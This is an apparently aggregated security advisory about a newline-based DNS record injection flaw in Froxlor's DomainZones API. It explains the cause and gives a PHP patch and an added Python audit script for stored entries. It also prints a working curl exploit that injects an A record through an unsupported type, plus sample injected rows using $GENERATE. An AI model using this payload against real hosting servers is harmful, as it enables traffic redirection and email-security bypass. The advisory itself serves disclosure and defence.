Froxlor: DNS Record Injection via Newline (Critical)

The vulnerability exists because DomainZones::add() lacks a whitelist for DNS record types. The ‘type’ parameter from user input is accepted directly, without validation against a set of allowed values. An if/elseif chain validates content only for 13 known types (A, AAAA, CAA, CNAME, DNAME, LOC, MX, NS, RP, SRV, SSHFP, TLSA, TXT). Any other type (e.g., NAPTR, PTR, HINFO) bypasses all content validation.

Additionally, the content field only receives trim(), which strips leading and trailing whitespace but preserves embedded newline characters. The AntiXSS filter does not strip newlines either, and the type dropdown in the web UI is a client-side restriction only. When an attacker submits an unsupported type with newlines in the content, the data is stored in the database as-is.

Later, DnsEntry::__toString() concatenates the content directly into zone file format without escaping newlines, and Bind.php writes this zone file to disk. BIND parses each newline-separated line as an independent resource record or directive. This allows injection of arbitrary DNS records (A, TXT, etc.) and BIND directives like $INCLUDE, $ORIGIN, $GENERATE. An authenticated customer with DNS editing enabled can execute this attack via an API call.

dailycve form:

Platform: Froxlor
Version: Unspecified (2.x)
Vulnerability: DNS injection
Severity: Critical
Date: 2024 (disclosed)

Prediction: Patch within 30d

What Undercode Say:

Analytics:

# Count vulnerable endpoints
grep -r "DomainZones::add" /var/www/froxlor/lib/Froxlor/Api/Commands/
# Check type whitelist absence
awk '/getParam.type/,/if/' lib/Froxlor/Api/Commands/DomainZones.php
# Simulate newline injection
echo -e "type=NAPTR\ncontent=test\n@ IN A 1.2.3.4" | curl -X POST ...

Exploit:

# Inject A record via newline
curl -s -X POST 'https://target/api.php' -u 'APIKEY:APISECRET' \
  -H 'Content-Type: application/json' \
  -d '{"command":"DomainZones.add","params":{"id":1,"type":"NAPTR","content":"100 10 \"\" \"\" \"\" .\n@ 300 IN A 1.2.3.4"}}'
# Trigger DNS rebuild
php /var/www/froxlor/scripts/froxlor_master_cronjob.php --force --dns
# Verify injection
dig @target example.com A +short

Protection from this CVE:

// Add type whitelist in DomainZones.php:93
$allowed_types = ['A','AAAA','CAA','CNAME','DNAME','LOC','MX','NS','RP','SRV','SSHFP','TLSA','TXT'];
// Strict comparison: reject anything that is not exactly one of the listed strings
if (!in_array($type, $allowed_types, true)) {
    throw new Exception("Unsupported type", 406);
}
// Strip newlines in content (line 154)
$content = trim(str_replace(["\r","\n"], '', $content));
// Also sanitize in DnsEntry::__toString()
$_content = str_replace(["\r","\n"], '', $this->content);

Impact: Authenticated customer can redirect domain traffic (inject A/AAAA), override email security (SPF/DKIM/DMARC via TXT), inject BIND directives ($INCLUDE, $GENERATE) to read local files or mass-generate records, or cause DNS service disruption by malformed zone files. In multi-tenant hosting, one customer compromises DNS for their domain and potentially affects server stability.
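
The whitelist and newline stripping above stop new submissions, but rows already stored stay in the database until someone looks for them. The following audit is an added example, not Froxlor code and not part of the original post; it assumes the DNS entries have been exported as (id, type, content) tuples, and all function names and sample rows are constructed for illustration.

```python
# Added audit example (not Froxlor code). Row shape (id, type, content) is an assumption.
# The 13 types the page lists as having content validation:
ALLOWED_TYPES = {"A", "AAAA", "CAA", "CNAME", "DNAME", "LOC", "MX",
                 "NS", "RP", "SRV", "SSHFP", "TLSA", "TXT"}
# BIND master-file directives that must never appear inside record content
DIRECTIVES = {"$INCLUDE", "$ORIGIN", "$GENERATE", "$TTL"}


def audit_entry(rtype, content):
    """Return a list of findings for one stored DNS entry."""
    findings = []
    if rtype.upper() not in ALLOWED_TYPES:
        findings.append("unvalidated-type:" + rtype)
    # Mirror trim(): only the ends are stripped, so inner line breaks survive
    body = content.strip().replace("\r\n", "\n").replace("\r", "\n")
    lines = body.split("\n")
    if len(lines) > 1:
        findings.append("embedded-newline")
        for extra in lines[1:]:
            words = extra.split()
            if not words:
                continue
            if words[0].upper() in DIRECTIVES:
                findings.append("directive:" + words[0].upper())
            else:
                findings.append("extra-record-line")
    return findings


def audit(rows):
    """Map row id -> findings, omitting clean rows."""
    report = {}
    for row_id, rtype, content in rows:
        found = audit_entry(rtype, content)
        if found:
            report[row_id] = found
    return report


# Constructed sample rows (documentation addresses, not from any real system)
SAMPLE_ROWS = [
    (1, "A", "192.0.2.10"),
    (2, "TXT", '"v=spf1 -all"'),
    (3, "NAPTR", '100 10 "" "" "" .\n@ 300 IN A 192.0.2.66'),
    (4, "HINFO", "x\r\n$GENERATE 1-5 h$ A 192.0.2.$"),
    (5, "PTR", "host.example.com."),
]

if __name__ == "__main__":
    for rid, found in audit(SAMPLE_ROWS).items():
        print(rid, ", ".join(found))
```

A row flagged only with unvalidated-type (row 5 here) is not necessarily malicious, but its content was never validated and should be reviewed before the next zone rebuild.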

Sources:

Reported By: github.com